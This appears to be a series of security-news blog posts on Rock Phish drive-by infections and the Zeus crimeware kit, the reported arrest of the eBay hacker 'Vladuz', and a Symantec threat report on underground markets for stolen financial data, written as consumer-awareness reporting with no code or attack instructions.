Apparently, the Rock Phish are now setting up a double whammy for anyone foolish enough to click on a socially engineered link received in a spam e-mail. Counting on the fact that a lot more people go to phishing sites than will actually type in their personal details, the Rock Phish are loading the sites with crimeware that steals personal information, automatically.

More specifically, Uriel describes the phenomenon of "drive by infection" as when:

This is done via a technique called "drive-by infection", wherein a vulnerability in the victim's operating system, browser, or software is exploited in order to infect the victim without his/her knowledge (and much less his/her consent, or with the victim having to proactively download software). The vulnerabilities that are exploited in these situations are often unknown to the software vendors and therefore often not addressed, leaving the victims defenseless (just like your humble servant finds himself when in the company of a beautiful woman).

Even worse, it appears that the Rock Phish make this easy for any criminal to mount a pretty sophisticated phising expedition by selling all the "tackle" necessary to do it for a measly $700.00.

Known as the "Zeus kit," in honor of the Zeus Trojan, the kit is pretty resistant to computer security programs and has the ability to mask itself using a binary generator. The binary generator sends out a unique set of numbers every time it is used, making it hard for security programs to detect since they rely on spotting what is known as a "signature." Even if a security program recognizes one signature, the binary generator changes it the next time, and the security program will probably fail to recognize it.

For the less technically inclined, the Zeus Kit offers a lot of operational capabilities for the information thief. Some of these capabilities are "the ability to take screenshots of a victim's machine, or control it remotely, or add additional pages to a website and monitor it, or steal passwords that have been stored by popular programs," according to Uriel.

There is little doubt that the criminal groups like the Rock Phish are making the Internet more dangerous all the time. So far as getting infected while "driving by" a site, Websense announced today that a mass attack via malicious JavaScript injection is infecting thousands of trusted sites, including government ones. According to report released today, this activity has exploded by a "factor of ten."

Sophos also mentioned in it's Q1 Security Threat Report that they are finding infected web pages at a rate of one every five seconds.

In simple terms, all the average web surfer has to do is visit one of these sites to become infected and have all their information stolen from them.

It's probably a good time to make sure you've updated the protection on your computer and to just say delete to any spam getting past whatever filer you are currently using. By the way, has anyone noticed besides me that more and more spam has been getting past these filters in the past couple of weeks?

Blog post at RSA by Uriel Malmon, here.

By the way, I noticed that despite a lot of us commenting on this great post, no one bothered to wish him a Happy Birthday. The post has a lot of good information on it and it would be nice to thank him for educating the rest of us.

Vladuz busted, according to eBay

Vladuz, the mysterious hacker, who seemed to take great pleasure in hacking eBay has been arrested, according to eBay.

Ina Steiner reports on the AuctionBytes blog:

A cyber-criminal who embarrassed eBay for nearly a year with claims he had hacked the site was arrested on Thursday, according to eBay. "Vladuz" had harassed eBay with his taunting from December 2006 through October 2007, when he accessed eBay servers and gained limited access to a very small number of eBay accounts on the eBay.com site. (eBay said at the time that at no point did the fraudster get any access to financial information or other sensitive information.).

Thus far only eBay is confirming the arrest:

eBay spokesperson Nichola Sharpe said local Romanian law enforcement officials would have to confirm details, as they considered the case confidential until a conviction was made. Asked why eBay had issued a press release, Sharpe said eBay wanted to thank all of the law enforcement agencies involved who collaborated in the case. She also said that the community was aware of Vladuz, and said, "This is obviously great news."

eBay states that Vladuz never accessed any financial information, but I’m not certain that was his intention in the first place.

There are some, who believe his intention was to point out the massive amount of fraud occurring on auction sites and show weaknesses that could be exploited in eBay’s system.

After all, unless he is mentally disturbed, why would he make his effort so public otherwise? Most criminals prefer to remain anonymous when they are committing financial crimes. They make a lot more money that way.

Here is a previous post, I did on the mysterious, Vladuz:

Did Vladuz hack eBay, or is stockpiled stolen information being used to make it look like he did?

Symantec releases Internet Threat Security Report

Symantec recently issued it's Internet Security Report, which covers the second half of 2007. The key findings in the report are that malicious activity has become web based, attackers are going after end users rather than computers, the underground community is maturing and consolidating and the bad guys are getting better at improvising and adapting.

The report confirms that hacker tool kits are increasingly making it easier for less sophisticated types to effective commit technical crimes. Symantec also believes that these tool kits are being professionally developed, which supports the deduction that the underground community is maturing and consolidating.

Perhaps the availability of tool kits is the reason that a 559 percent increase in phishing websites has been noted?

The report also shows that the bad guys are going after "trusted" sites, such as social networking sites.

The underground economy in stolen financial details is also on the increase. These details, which are sold in Internet forums are getting cheaper. With all the phishing going on coupled with a record amount of data breaches an over abundant supply of stolen information is likely the reason for this. The report found a wide variety of pricing on payment card numbers, ranging from .40 cents to $20 per card.

The easy availability of encoders and other portable payment card technology makes it "too easy" to counterfeit the numbers into realistic looking plastic. In addition to this, there is a thriving market in counterfeit documents, which provides a wide-array of realistic counterfeit identification to vet the counterfeit financial instruments.

Besides identities and payment card details, stolen bank accounts are becoming increasingly available. Symantec attributes the increase in bank account information to a mirror increase in banking trojans over the second half of 2007.

Besides being used to clean out an account, bank account details are useful to criminals when they commit check fraud. Anyone, who follows scams on the Internet, knows that counterfeit checks are being delivered to unsuspecting mules to cash in a variety of advance fee (419) type scams. Please note there are organized gangs, who move from area to area committing check fraud using mules, who know exactly what they are doing, also.

Recently, an International task force monitored the mail and discovered large amounts of counterfeit checks being shipped throughout North America and the European Union.

All in all this report is a very interesting read. If you are a more visual type, Symantec also did a very nice flash presentation on this, which can be seen on the page linked to in the previous sentence.